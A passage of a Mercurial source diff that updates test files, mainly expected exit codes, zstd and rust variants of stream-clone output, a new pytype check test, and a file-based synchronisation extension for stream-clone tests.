2d 6e 6f 64 65 6d 61 70 2c 72 65 76 6c 6f |nt-nodemap,revlo| (rust !) + 0030: 67 76 31 00 64 61 74 61 2f 66 6f 6f 2e 69 00 36 |gv1.data/foo.i.6| (rust !) $ hg debugbundle --spec packednongd.hg - none-packed1;requirements%3Drevlogv1 + none-packed1;requirements%3Drevlogv1 (no-rust !) + none-packed1;requirements%3Dpersistent-nodemap%2Crevlogv1 (rust !) Warning emitted when packed bundles contain secret changesets @@ -341,7 +358,8 @@ $ hg -R testsecret debugcreatestreamclonebundle packedsecret.hg (warning: stream clone bundle will contain secret revisions) writing 301 bytes for 3 files - bundle requirements: generaldelta, revlogv1, sparserevlog + bundle requirements: generaldelta, revlogv1, sparserevlog (no-rust !) + bundle requirements: generaldelta, persistent-nodemap, revlogv1, sparserevlog (rust !) Unpacking packed1 bundles with "hg unbundle" isn't allowed @@ -733,7 +751,7 @@ partial history bundle, fails w/ unknown parent $ hg -R bundle.hg verify - abort: 00changelog.i@bbd179dfa0a7: unknown parent + abort: 00changelog.i@bbd179dfa0a71671c253b3ae0aa1513b60d199fa: unknown parent [50] full history bundle, refuses to verify non-local repo diff --git a/tests/test-bundle2-exchange.t b/tests/test-bundle2-exchange.t --- a/tests/test-bundle2-exchange.t +++ b/tests/test-bundle2-exchange.t @@ -548,7 +548,7 @@ remote: Abandon ship! remote: (don't panic) abort: push failed on remote - [255] + [100] $ hg -R main push http://localhost:$HGPORT2/ -r e7ec4e813ba6 pushing to http://localhost:$HGPORT2/ @@ -556,7 +556,7 @@ remote: Abandon ship! remote: (don't panic) abort: push failed on remote - [255] + [100] Doing the actual push: unknown mandatory parts @@ -570,19 +570,19 @@ pushing to other searching for changes abort: missing support for test:unknown - [255] + [100] $ hg -R main push ssh://user@dummy/other -r e7ec4e813ba6 pushing to ssh://user@dummy/other searching for changes abort: missing support for test:unknown - [255] + [100] $ hg -R main push http://localhost:$HGPORT2/ -r e7ec4e813ba6 pushing to http://localhost:$HGPORT2/ searching for changes abort: missing support for test:unknown - [255] + [100] Doing the actual push: race @@ -638,7 +638,7 @@ remote: Cleaning up the mess... remote: rollback completed abort: pretxnclose.failpush hook exited with status 1 - [255] + [40] $ hg -R main push ssh://user@dummy/other -r e7ec4e813ba6 pushing to ssh://user@dummy/other @@ -653,7 +653,7 @@ remote: rollback completed remote: pretxnclose.failpush hook exited with status 1 abort: push failed on remote - [255] + [100] $ hg -R main push http://localhost:$HGPORT2/ -r e7ec4e813ba6 pushing to http://localhost:$HGPORT2/ @@ -668,7 +668,7 @@ remote: rollback completed remote: pretxnclose.failpush hook exited with status 1 abort: push failed on remote - [255] + [100] (check that no 'pending' files remain) @@ -699,7 +699,7 @@ remote: Cleaning up the mess... remote: rollback completed abort: pretxnchangegroup hook exited with status 1 - [255] + [40] $ hg -R main push ssh://user@dummy/other -r e7ec4e813ba6 pushing to ssh://user@dummy/other searching for changes @@ -712,7 +712,7 @@ remote: rollback completed remote: pretxnchangegroup hook exited with status 1 abort: push failed on remote - [255] + [100] $ hg -R main push http://localhost:$HGPORT2/ -r e7ec4e813ba6 pushing to http://localhost:$HGPORT2/ searching for changes @@ -725,7 +725,7 @@ remote: rollback completed remote: pretxnchangegroup hook exited with status 1 abort: push failed on remote - [255] + [100] Check output capture control. @@ -747,7 +747,7 @@ Cleaning up the mess... rollback completed abort: pretxnchangegroup hook exited with status 1 - [255] + [40] $ hg -R main push ssh://user@dummy/other -r e7ec4e813ba6 pushing to ssh://user@dummy/other searching for changes @@ -760,7 +760,7 @@ remote: rollback completed remote: pretxnchangegroup hook exited with status 1 abort: push failed on remote - [255] + [100] $ hg -R main push http://localhost:$HGPORT2/ -r e7ec4e813ba6 pushing to http://localhost:$HGPORT2/ searching for changes @@ -773,7 +773,7 @@ remote: rollback completed remote: pretxnchangegroup hook exited with status 1 abort: push failed on remote - [255] + [100] Check abort from mandatory pushkey @@ -950,7 +950,7 @@ searching for changes remote: Lock should not be taken abort: push failed on remote - [255] + [100] $ cat >> ../lazylock/.hg/hgrc <<EOF > [experimental] diff --git a/tests/test-bundle2-remote-changegroup.t b/tests/test-bundle2-remote-changegroup.t --- a/tests/test-bundle2-remote-changegroup.t +++ b/tests/test-bundle2-remote-changegroup.t @@ -542,7 +542,7 @@ searching for changes remote: remote-changegroup abort: missing support for remote-changegroup - digest:foo - [255] + [100] Missing digest diff --git a/tests/test-casecollision-merge.t b/tests/test-casecollision-merge.t --- a/tests/test-casecollision-merge.t +++ b/tests/test-casecollision-merge.t @@ -145,7 +145,7 @@ $ hg merge abort: case-folding collision between [aA] and [Aa] (re) - [255] + [20] $ hg parents --template '{rev}\n' 4 $ hg status -A @@ -158,7 +158,7 @@ 1 files updated, 0 files merged, 2 files removed, 0 files unresolved $ hg merge abort: case-folding collision between [aA] and [Aa] (re) - [255] + [20] $ hg parents --template '{rev}\n' 2 $ hg status -A @@ -213,7 +213,7 @@ $ hg merge 0 abort: case-folding collision between Aa and directory of aA/a - [255] + [20] (note: no collision between 0 and 00 or 000/f) Directory case-folding collision: @@ -328,7 +328,7 @@ A B $ hg update abort: case-folding collision between [bB] and [Bb] (re) - [255] + [20] $ hg update --check abort: uncommitted changes diff --git a/tests/test-casefolding.t b/tests/test-casefolding.t --- a/tests/test-casefolding.t +++ b/tests/test-casefolding.t @@ -115,7 +115,7 @@ $ hg up A: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ cat a gold $ rm a diff --git a/tests/test-check-code.t b/tests/test-check-code.t --- a/tests/test-check-code.t +++ b/tests/test-check-code.t @@ -11,6 +11,7 @@ > -X contrib/python-zstandard \ > -X hgext/fsmonitor/pywatchman \ > -X mercurial/thirdparty \ + > -X mercurial/pythoncapi_compat.h \ > | sed 's-\\-/-g' | "$check_code" --warnings --per-file=0 - || false Skipping contrib/automation/hgautomation/__init__.py it has no-che?k-code (glob) Skipping contrib/automation/hgautomation/aws.py it has no-che?k-code (glob) @@ -65,10 +66,10 @@ COPYING Makefile README.rst - black.toml hg hgeditor hgweb.cgi + pyproject.toml rustfmt.toml setup.py diff --git a/tests/test-check-format.t b/tests/test-check-format.t --- a/tests/test-check-format.t +++ b/tests/test-check-format.t @@ -1,5 +1,11 @@ #require black test-repo +Black needs the real USERPROFILE in order to run on Windows +#if msys + $ USERPROFILE="$REALUSERPROFILE" + $ export USERPROFILE +#endif + $ cd $RUNTESTDIR/.. - $ black --config=black.toml --check --diff `hg files 'set:(**.py + grep("^#!.*python")) - mercurial/thirdparty/**'` + $ black --check --diff `hg files 'set:(**.py + grep("^#!.*python")) - mercurial/thirdparty/**'` diff --git a/tests/test-check-interfaces.py b/tests/test-check-interfaces.py --- a/tests/test-check-interfaces.py +++ b/tests/test-check-interfaces.py @@ -85,6 +85,7 @@ class dummyrepo(object): def __init__(self): self.ui = uimod.ui() + self._wanted_sidedata = set() def filtered(self, name): pass @@ -113,6 +114,10 @@ def close(self): pass + @property + def closed(self): + pass + def main(): ui = uimod.ui() @@ -243,7 +248,10 @@ # Conforms to imanifestlog. ml = manifest.manifestlog( - vfs, repo, manifest.manifestrevlog(repo.svfs), repo.narrowmatch() + vfs, + repo, + manifest.manifestrevlog(repo.nodeconstants, repo.svfs), + repo.narrowmatch(), ) checkzobject(ml) checkzobject(repo.manifestlog) @@ -258,7 +266,7 @@ # Conforms to imanifestdict. checkzobject(mctx.read()) - mrl = manifest.manifestrevlog(vfs) + mrl = manifest.manifestrevlog(repo.nodeconstants, vfs) checkzobject(mrl) ziverify.verifyClass(repository.irevisiondelta, revlog.revlogrevisiondelta) @@ -272,6 +280,7 @@ flags=b'', baserevisionsize=None, revision=b'', + sidedata=b'', delta=None, ) checkzobject(rd) diff --git a/tests/test-check-module-imports.t b/tests/test-check-module-imports.t --- a/tests/test-check-module-imports.t +++ b/tests/test-check-module-imports.t @@ -14,6 +14,10 @@ Known-bad files are excluded by -X as some of them would produce unstable outputs, which should be fixed later. +NOTE: the `hg locate` command here only works on files that are known to +Mercurial. If you add an import of a new file and haven't yet `hg add`ed it, you +will likely receive warnings about a direct import. + $ testrepohg locate 'set:**.py or grep(r"^#!.*?python")' \ > 'tests/**.t' \ > -X hgweb.cgi \ diff --git a/tests/test-check-pytype.t b/tests/test-check-pytype.t new file mode 100644 --- /dev/null +++ b/tests/test-check-pytype.t @@ -0,0 +1,104 @@ +#require pytype py3 slow + + $ cd $RUNTESTDIR/.. + +Many of the individual files that are excluded here confuse pytype +because they do a mix of Python 2 and Python 3 things +conditionally. There's no good way to help it out with that as far as +I can tell, so let's just hide those files from it for now. We should +endeavor to empty this list out over time, as some of these are +probably hiding real problems. + +mercurial/bundlerepo.py # no vfs and ui attrs on bundlerepo +mercurial/changegroup.py # mysterious incorrect type detection +mercurial/chgserver.py # [attribute-error] +mercurial/cmdutil.py # No attribute 'markcopied' on mercurial.context.filectx [attribute-error] +mercurial/context.py # many [attribute-error] +mercurial/copies.py # No attribute 'items' on None [attribute-error] +mercurial/crecord.py # tons of [attribute-error], [module-attr] +mercurial/debugcommands.py # [wrong-arg-types] +mercurial/dispatch.py # initstdio: No attribute ... on TextIO [attribute-error] +mercurial/exchange.py # [attribute-error] +mercurial/hgweb/hgweb_mod.py # [attribute-error], [name-error], [wrong-arg-types] +mercurial/hgweb/server.py # [attribute-error], [name-error], [module-attr] +mercurial/hgweb/webcommands.py # [missing-parameter] +mercurial/hgweb/wsgicgi.py # confused values in os.environ +mercurial/httppeer.py # [attribute-error], [wrong-arg-types] +mercurial/interfaces # No attribute 'capabilities' on peer [attribute-error] +mercurial/keepalive.py # [attribute-error] +mercurial/localrepo.py # [attribute-error] +mercurial/lsprof.py # unguarded import +mercurial/manifest.py # [unsupported-operands], [wrong-arg-types] +mercurial/minirst.py # [unsupported-operands], [attribute-error] +mercurial/patch.py # [wrong-arg-types] +mercurial/pure/osutil.py # [invalid-typevar], [not-callable] +mercurial/pure/parsers.py # [attribute-error] +mercurial/pycompat.py # bytes vs str issues +mercurial/repoview.py # [attribute-error] +mercurial/sslutil.py # [attribute-error] +mercurial/statprof.py # bytes vs str on TextIO.write() [wrong-arg-types] +mercurial/testing/storage.py # tons of [attribute-error] +mercurial/ui.py # [attribute-error], [wrong-arg-types] +mercurial/unionrepo.py # ui, svfs, unfiltered [attribute-error] +mercurial/upgrade.py # line 84, in upgraderepo: No attribute 'discard' on Dict[nothing, nothing] [attribute-error] +mercurial/util.py # [attribute-error], [wrong-arg-count] +mercurial/utils/procutil.py # [attribute-error], [module-attr], [bad-return-type] +mercurial/utils/stringutil.py # [module-attr], [wrong-arg-count] +mercurial/utils/memorytop.py # not 3.6 compatible +mercurial/win32.py # [not-callable] +mercurial/wireprotoframing.py # [unsupported-operands], [attribute-error], [import-error] +mercurial/wireprotoserver.py # line 253, in _availableapis: No attribute '__iter__' on Callable[[Any, Any], Any] [attribute-error] +mercurial/wireprotov1peer.py # [attribute-error] +mercurial/wireprotov1server.py # BUG?: BundleValueError handler accesses subclass's attrs +mercurial/wireprotov2server.py # [unsupported-operands], [attribute-error] + +TODO: use --no-cache on test server? Caching the files locally helps during +development, but may be a hinderance for CI testing. + + $ pytype -V 3.6 --keep-going --jobs auto mercurial \ + > -x mercurial/bundlerepo.py \ + > -x mercurial/changegroup.py \ + > -x mercurial/chgserver.py \ + > -x mercurial/cmdutil.py \ + > -x mercurial/context.py \ + > -x mercurial/copies.py \ + > -x mercurial/crecord.py \ + > -x mercurial/debugcommands.py \ + > -x mercurial/dispatch.py \ + > -x mercurial/exchange.py \ + > -x mercurial/hgweb/hgweb_mod.py \ + > -x mercurial/hgweb/server.py \ + > -x mercurial/hgweb/webcommands.py \ + > -x mercurial/hgweb/wsgicgi.py \ + > -x mercurial/httppeer.py \ + > -x mercurial/interfaces \ + > -x mercurial/keepalive.py \ + > -x mercurial/localrepo.py \ + > -x mercurial/lsprof.py \ + > -x mercurial/manifest.py \ + > -x mercurial/minirst.py \ + > -x mercurial/patch.py \ + > -x mercurial/pure/osutil.py \ + > -x mercurial/pure/parsers.py \ + > -x mercurial/pycompat.py \ + > -x mercurial/repoview.py \ + > -x mercurial/sslutil.py \ + > -x mercurial/statprof.py \ + > -x mercurial/testing/storage.py \ + > -x mercurial/thirdparty \ + > -x mercurial/ui.py \ + > -x mercurial/unionrepo.py \ + > -x mercurial/upgrade.py \ + > -x mercurial/utils/procutil.py \ + > -x mercurial/utils/stringutil.py \ + > -x mercurial/utils/memorytop.py \ + > -x mercurial/win32.py \ + > -x mercurial/wireprotoframing.py \ + > -x mercurial/wireprotoserver.py \ + > -x mercurial/wireprotov1peer.py \ + > -x mercurial/wireprotov1server.py \ + > -x mercurial/wireprotov2server.py \ + > > $TESTTMP/pytype-output.txt || cat $TESTTMP/pytype-output.txt + +Only show the results on a failure, because the output on success is also +voluminous and variable. diff --git a/tests/test-churn.t b/tests/test-churn.t --- a/tests/test-churn.t +++ b/tests/test-churn.t @@ -195,3 +195,22 @@ alltogether 11 ********************************************************* $ cd .. + +count lines that look like headings but are not + + $ hg init not-headers + $ cd not-headers + $ cat > a <<EOF + > diff + > @@ -195,3 +195,21 @@ + > -- a/tests/test-churn.t + > ++ b/tests/test-churn.t + > EOF + $ hg ci -Am adda -u user1 + adding a + $ hg churn --diffstat + user1 +4/-0 ++++++++++++++++++++++++++++++++++++++++++++++++++++++ + $ hg rm a + $ hg ci -Am removea -u user1 + $ hg churn --diffstat + user1 +4/-4 +++++++++++++++++++++++++++--------------------------- diff --git a/tests/test-clone-uncompressed.t b/tests/test-clone-uncompressed.t --- a/tests/test-clone-uncompressed.t +++ b/tests/test-clone-uncompressed.t @@ -73,7 +73,6 @@ remote-changegroup http https - rev-branch-cache $ hg clone --stream -U http://localhost:$HGPORT server-disabled warning: stream clone requested but server has them disabled @@ -141,7 +140,6 @@ remote-changegroup http https - rev-branch-cache $ hg clone --stream -U http://localhost:$HGPORT server-disabled warning: stream clone requested but server has them disabled @@ -171,7 +169,7 @@ $ killdaemons.py $ cd server - $ hg serve -p $HGPORT -d --pid-file=hg.pid + $ hg serve -p $HGPORT -d --pid-file=hg.pid --error errors.txt $ cat hg.pid > $DAEMON_PIDS $ cd .. @@ -180,16 +178,21 @@ #if stream-legacy $ hg clone --stream -U http://localhost:$HGPORT clone1 streaming all changes - 1027 files to transfer, 96.3 KB of data - transferred 96.3 KB in * seconds (*/sec) (glob) + 1027 files to transfer, 96.3 KB of data (no-zstd !) + transferred 96.3 KB in * seconds (*/sec) (glob) (no-zstd !) + 1027 files to transfer, 93.5 KB of data (zstd !) + transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found + $ cat server/errors.txt #endif #if stream-bundle2 $ hg clone --stream -U http://localhost:$HGPORT clone1 streaming all changes - 1030 files to transfer, 96.5 KB of data - transferred 96.5 KB in * seconds (* */sec) (glob) + 1030 files to transfer, 96.5 KB of data (no-zstd !) + transferred 96.5 KB in * seconds (*/sec) (glob) (no-zstd !) + 1030 files to transfer, 93.6 KB of data (zstd !) + transferred 93.6 KB in * seconds (* */sec) (glob) (zstd !) $ ls -1 clone1/.hg/cache branch2-base @@ -203,6 +206,7 @@ rbc-revs-v1 tags2 tags2-served + $ cat server/errors.txt #endif getbundle requests with stream=1 are uncompressed @@ -213,39 +217,68 @@ $ f --size --hex --bytes 256 body - body: size=112262 + body: size=112262 (no-zstd !) + body: size=109410 (zstd no-rust !) + body: size=109431 (rust !) 0000: 04 6e 6f 6e 65 48 47 32 30 00 00 00 00 00 00 00 |.noneHG20.......| - 0010: 7f 07 53 54 52 45 41 4d 32 00 00 00 00 03 00 09 |..STREAM2.......| - 0020: 05 09 04 0c 44 62 79 74 65 63 6f 75 6e 74 39 38 |....Dbytecount98| - 0030: 37 37 35 66 69 6c 65 63 6f 75 6e 74 31 30 33 30 |775filecount1030| + 0010: 7f 07 53 54 52 45 41 4d 32 00 00 00 00 03 00 09 |..STREAM2.......| (no-zstd !) + 0020: 05 09 04 0c 44 62 79 74 65 63 6f 75 6e 74 39 38 |....Dbytecount98| (no-zstd !) + 0030: 37 37 35 66 69 6c 65 63 6f 75 6e 74 31 30 33 30 |775filecount1030| (no-zstd !) + 0010: 99 07 53 54 52 45 41 4d 32 00 00 00 00 03 00 09 |..STREAM2.......| (zstd no-rust !) + 0010: ae 07 53 54 52 45 41 4d 32 00 00 00 00 03 00 09 |..STREAM2.......| (rust !) + 0020: 05 09 04 0c 5e 62 79 74 65 63 6f 75 6e 74 39 35 |....^bytecount95| (zstd no-rust !) + 0020: 05 09 04 0c 73 62 79 74 65 63 6f 75 6e 74 39 35 |....sbytecount95| (rust !) + 0030: 38 39 37 66 69 6c 65 63 6f 75 6e 74 31 30 33 30 |897filecount1030| (zstd !) 0040: 72 65 71 75 69 72 65 6d 65 6e 74 73 64 6f 74 65 |requirementsdote| 0050: 6e 63 6f 64 65 25 32 43 66 6e 63 61 63 68 65 25 |ncode%2Cfncache%| 0060: 32 43 67 65 6e 65 72 61 6c 64 65 6c 74 61 25 32 |2Cgeneraldelta%2| - 0070: 43 72 65 76 6c 6f 67 76 31 25 32 43 73 70 61 72 |Crevlogv1%2Cspar| - 0080: 73 65 72 65 76 6c 6f 67 25 32 43 73 74 6f 72 65 |serevlog%2Cstore| - 0090: 00 00 80 00 73 08 42 64 61 74 61 2f 30 2e 69 00 |....s.Bdata/0.i.| - 00a0: 03 00 01 00 00 00 00 00 00 00 02 00 00 00 01 00 |................| - 00b0: 00 00 00 00 00 00 01 ff ff ff ff ff ff ff ff 80 |................| - 00c0: 29 63 a0 49 d3 23 87 bf ce fe 56 67 92 67 2c 69 |)c.I.#....Vg.g,i| - 00d0: d1 ec 39 00 00 00 00 00 00 00 00 00 00 00 00 75 |..9............u| - 00e0: 30 73 08 42 64 61 74 61 2f 31 2e 69 00 03 00 01 |0s.Bdata/1.i....| - 00f0: 00 00 00 00 00 00 00 02 00 00 00 01 00 00 00 00 |................| + 0070: 43 72 65 76 6c 6f 67 76 31 25 32 43 73 70 61 72 |Crevlogv1%2Cspar| (no-zstd !) + 0080: 73 65 72 65 76 6c 6f 67 25 32 43 73 74 6f 72 65 |serevlog%2Cstore| (no-zstd !) + 0090: 00 00 80 00 73 08 42 64 61 74 61 2f 30 2e 69 00 |....s.Bdata/0.i.| (no-zstd !) + 00a0: 03 00 01 00 00 00 00 00 00 00 02 00 00 00 01 00 |................| (no-zstd !) + 00b0: 00 00 00 00 00 00 01 ff ff ff ff ff ff ff ff 80 |................| (no-zstd !) + 00c0: 29 63 a0 49 d3 23 87 bf ce fe 56 67 92 67 2c 69 |)c.I.#....Vg.g,i| (no-zstd !) + 00d0: d1 ec 39 00 00 00 00 00 00 00 00 00 00 00 00 75 |..9............u| (no-zstd !) + 00e0: 30 73 08 42 64 61 74 61 2f 31 2e 69 00 03 00 01 |0s.Bdata/1.i....| (no-zstd !) + 00f0: 00 00 00 00 00 00 00 02 00 00 00 01 00 00 00 00 |................| (no-zstd !) + 0070: 43 72 65 76 6c 6f 67 2d 63 6f 6d 70 72 65 73 73 |Crevlog-compress| (zstd no-rust !) + 0070: 43 70 65 72 73 69 73 74 65 6e 74 2d 6e 6f 64 65 |Cpersistent-node| (rust !) + 0080: 69 6f 6e 2d 7a 73 74 64 25 32 43 72 65 76 6c 6f |ion-zstd%2Crevlo| (zstd no-rust !) + 0080: 6d 61 70 25 32 43 72 65 76 6c 6f 67 2d 63 6f 6d |map%2Crevlog-com| (rust !) + 0090: 67 76 31 25 32 43 73 70 61 72 73 65 72 65 76 6c |gv1%2Csparserevl| (zstd no-rust !) + 0090: 70 72 65 73 73 69 6f 6e 2d 7a 73 74 64 25 32 43 |pression-zstd%2C| (rust !) + 00a0: 6f 67 25 32 43 73 74 6f 72 65 00 00 80 00 73 08 |og%2Cstore....s.| (zstd no-rust !) + 00a0: 72 65 76 6c 6f 67 76 31 25 32 43 73 70 61 72 73 |revlogv1%2Cspars| (rust !) + 00b0: 42 64 61 74 61 2f 30 2e 69 00 03 00 01 00 00 00 |Bdata/0.i.......| (zstd no-rust !) + 00b0: 65 72 65 76 6c 6f 67 25 32 43 73 74 6f 72 65 00 |erevlog%2Cstore.| (rust !) + 00c0: 00 00 00 00 02 00 00 00 01 00 00 00 00 00 00 00 |................| (zstd no-rust !) + 00c0: 00 80 00 73 08 42 64 61 74 61 2f 30 2e 69 00 03 |...s.Bdata/0.i..| (rust !) + 00d0: 01 ff ff ff ff ff ff ff ff 80 29 63 a0 49 d3 23 |..........)c.I.#| (zstd no-rust !) + 00d0: 00 01 00 00 00 00 00 00 00 02 00 00 00 01 00 00 |................| (rust !) + 00e0: 87 bf ce fe 56 67 92 67 2c 69 d1 ec 39 00 00 00 |....Vg.g,i..9...| (zstd no-rust !) + 00e0: 00 00 00 00 00 01 ff ff ff ff ff ff ff ff 80 29 |...............)| (rust !) + 00f0: 00 00 00 00 00 00 00 00 00 75 30 73 08 42 64 61 |.........u0s.Bda| (zstd no-rust !) + 00f0: 63 a0 49 d3 23 87 bf ce fe 56 67 92 67 2c 69 d1 |c.I.#....Vg.g,i.| (rust !) --uncompressed is an alias to --stream #if stream-legacy $ hg clone --uncompressed -U http://localhost:$HGPORT clone1-uncompressed streaming all changes - 1027 files to transfer, 96.3 KB of data - transferred 96.3 KB in * seconds (*/sec) (glob) + 1027 files to transfer, 96.3 KB of data (no-zstd !) + transferred 96.3 KB in * seconds (*/sec) (glob) (no-zstd !) + 1027 files to transfer, 93.5 KB of data (zstd !) + transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found #endif #if stream-bundle2 $ hg clone --uncompressed -U http://localhost:$HGPORT clone1-uncompressed streaming all changes - 1030 files to transfer, 96.5 KB of data - transferred 96.5 KB in * seconds (* */sec) (glob) + 1030 files to transfer, 96.5 KB of data (no-zstd !) + transferred 96.5 KB in * seconds (* */sec) (glob) (no-zstd !) + 1030 files to transfer, 93.6 KB of data (zstd !) + transferred 93.6 KB in * seconds (* */sec) (glob) (zstd !) #endif Clone with background file closing enabled @@ -257,10 +290,12 @@ sending branchmap command streaming all changes sending stream_out command - 1027 files to transfer, 96.3 KB of data + 1027 files to transfer, 96.3 KB of data (no-zstd !) + 1027 files to transfer, 93.5 KB of data (zstd !) starting 4 threads for background file closing updating the branch cache - transferred 96.3 KB in * seconds (*/sec) (glob) + transferred 96.3 KB in * seconds (*/sec) (glob) (no-zstd !) + transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !) query 1; heads sending batch command searching for changes @@ -287,12 +322,15 @@ bundle2-input-bundle: with-transaction bundle2-input-part: "stream2" (params: 3 mandatory) supported applying stream bundle - 1030 files to transfer, 96.5 KB of data + 1030 files to transfer, 96.5 KB of data (no-zstd !) + 1030 files to transfer, 93.6 KB of data (zstd !) starting 4 threads for background file closing starting 4 threads for background file closing updating the branch cache - transferred 96.5 KB in * seconds (* */sec) (glob) - bundle2-input-part: total payload size 112094 + transferred 96.5 KB in * seconds (* */sec) (glob) (no-zstd !) + bundle2-input-part: total payload size 112094 (no-zstd !) + transferred 93.6 KB in * seconds (* */sec) (glob) (zstd !) + bundle2-input-part: total payload size 109216 (zstd !) bundle2-input-part: "listkeys" (params: 1 mandatory) supported bundle2-input-bundle: 2 parts total checking for updated bookmarks @@ -324,16 +362,20 @@ #if stream-legacy $ hg clone --stream -U http://localhost:$HGPORT secret-allowed streaming all changes - 1027 files to transfer, 96.3 KB of data - transferred 96.3 KB in * seconds (*/sec) (glob) + 1027 files to transfer, 96.3 KB of data (no-zstd !) + transferred 96.3 KB in * seconds (*/sec) (glob) (no-zstd !) + 1027 files to transfer, 93.5 KB of data (zstd !) + transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found #endif #if stream-bundle2 $ hg clone --stream -U http://localhost:$HGPORT secret-allowed streaming all changes - 1030 files to transfer, 96.5 KB of data - transferred 96.5 KB in * seconds (* */sec) (glob) + 1030 files to transfer, 96.5 KB of data (no-zstd !) + transferred 96.5 KB in * seconds (* */sec) (glob) (no-zstd !) + 1030 files to transfer, 93.6 KB of data (zstd !) + transferred 93.6 KB in * seconds (* */sec) (glob) (zstd !) #endif $ killdaemons.py @@ -368,7 +410,7 @@ remote: abort: server has pull-based clones disabled abort: pull failed on remote (remove --pull if specified or upgrade Mercurial) - [255] + [100] Local stream clone with secrets involved (This is just a test over behavior: if you have access to the repo's files, @@ -391,14 +433,35 @@ extension for delaying the server process so we reliably can modify the repo while cloning - $ cat > delayer.py <<EOF - > import time - > from mercurial import extensions, vfs - > def __call__(orig, self, path, *args, **kwargs): - > if path == 'data/f1.i': - > time.sleep(2) - > return orig(self, path, *args, **kwargs) - > extensions.wrapfunction(vfs.vfs, '__call__', __call__) + $ cat > stream_steps.py <<EOF + > import os + > import sys + > from mercurial import ( + > encoding, + > extensions, + > streamclone, + > testing, + > ) + > WALKED_FILE_1 = encoding.environ[b'HG_TEST_STREAM_WALKED_FILE_1'] + > WALKED_FILE_2 = encoding.environ[b'HG_TEST_STREAM_WALKED_FILE_2'] + > + > def _test_sync_point_walk_1(orig, repo): + > testing.write_file(WALKED_FILE_1) + > + > def _test_sync_point_walk_2(orig, repo): + > assert repo._currentlock(repo._lockref) is None + > testing.wait_file(WALKED_FILE_2) + > + > extensions.wrapfunction( + > streamclone, + > '_test_sync_point_walk_1', + > _test_sync_point_walk_1 + > ) + > extensions.wrapfunction( + > streamclone, + > '_test_sync_point_walk_2', + > _test_sync_point_walk_2 + > ) > EOF prepare repo with small and big file to cover both code paths in emitrevlogdata @@ -407,20 +470,32 @@ $ touch repo/f1 $ $TESTDIR/seq.py 50000 > repo/f2 $ hg -R repo ci -Aqm "0" - $ hg serve -R repo -p $HGPORT1 -d --pid-file=hg.pid --config extensions.delayer=delayer.py + $ HG_TEST_STREAM_WALKED_FILE_1="$TESTTMP/sync_file_walked_1" + $ export HG_TEST_STREAM_WALKED_FILE_1 + $ HG_TEST_STREAM_WALKED_FILE_2="$TESTTMP/sync_file_walked_2" + $ export HG_TEST_STREAM_WALKED_FILE_2 + $ HG_TEST_STREAM_WALKED_FILE_3="$TESTTMP/sync_file_walked_3" + $ export HG_TEST_STREAM_WALKED_FILE_3 +# $ cat << EOF >> $HGRCPATH +# > [hooks] +# > pre-clone=rm -f "$TESTTMP/sync_file_walked_*" +# > EOF + $ hg serve -R repo -p $HGPORT1 -d --error errors.log --pid-file=hg.pid --config extensions.stream_steps="$RUNTESTDIR/testlib/ext-stream-clone-steps.py" $ cat hg.pid >> $DAEMON_PIDS clone while modifying the repo between stating file with write lock and actually serving file content - $ hg clone -q --stream -U http://localhost:$HGPORT1 clone & - $ sleep 1 + $ (hg clone -q --stream -U http://localhost:$HGPORT1 clone; touch "$HG_TEST_STREAM_WALKED_FILE_3") & + $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_1 $ echo >> repo/f1 $ echo >> repo/f2 $ hg -R repo ci -m "1" --config ui.timeout.warn=-1 - $ wait + $ touch $HG_TEST_STREAM_WALKED_FILE_2 + $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_3 $ hg -R clone id 000000000000 + $ cat errors.log $ cd .. Stream repository with bookmarks @@ -439,8 +514,10 @@ #if stream-legacy $ hg clone --stream http://localhost:$HGPORT with-bookmarks streaming all changes - 1027 files to transfer, 96.3 KB of data - transferred 96.3 KB in * seconds (*) (glob) + 1027 files to transfer, 96.3 KB of data (no-zstd !) + transferred 96.3 KB in * seconds (*) (glob) (no-zstd !) + 1027 files to transfer, 93.5 KB of data (zstd !) + transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found updating to branch default @@ -449,8 +526,10 @@ #if stream-bundle2 $ hg clone --stream http://localhost:$HGPORT with-bookmarks streaming all changes - 1033 files to transfer, 96.6 KB of data - transferred 96.6 KB in * seconds (* */sec) (glob) + 1033 files to transfer, 96.6 KB of data (no-zstd !) + transferred 96.6 KB in * seconds (* */sec) (glob) (no-zstd !) + 1033 files to transfer, 93.8 KB of data (zstd !) + transferred 93.8 KB in * seconds (* */sec) (glob) (zstd !) updating to branch default 1025 files updated, 0 files merged, 0 files removed, 0 files unresolved #endif @@ -469,8 +548,10 @@ #if stream-legacy $ hg clone --stream http://localhost:$HGPORT phase-publish streaming all changes - 1027 files to transfer, 96.3 KB of data - transferred 96.3 KB in * seconds (*) (glob) + 1027 files to transfer, 96.3 KB of data (no-zstd !) + transferred 96.3 KB in * seconds (*) (glob) (no-zstd !) + 1027 files to transfer, 93.5 KB of data (zstd !) + transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found updating to branch default @@ -479,8 +560,10 @@ #if stream-bundle2 $ hg clone --stream http://localhost:$HGPORT phase-publish streaming all changes - 1033 files to transfer, 96.6 KB of data - transferred 96.6 KB in * seconds (* */sec) (glob) + 1033 files to transfer, 96.6 KB of data (no-zstd !) + transferred 96.6 KB in * seconds (* */sec) (glob) (no-zstd !) + 1033 files to transfer, 93.8 KB of data (zstd !) + transferred 93.8 KB in * seconds (* */sec) (glob) (zstd !) updating to branch default 1025 files updated, 0 files merged, 0 files removed, 0 files unresolved #endif @@ -505,8 +588,10 @@ $ hg clone --stream http://localhost:$HGPORT phase-no-publish streaming all changes - 1027 files to transfer, 96.3 KB of data - transferred 96.3 KB in * seconds (*) (glob) + 1027 files to transfer, 96.3 KB of data (no-zstd !) + transferred 96.3 KB in * seconds (* */sec) (glob) (no-zstd !) + 1027 files to transfer, 93.5 KB of data (zstd !) + transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found updating to branch default @@ -518,8 +603,10 @@ #if stream-bundle2 $ hg clone --stream 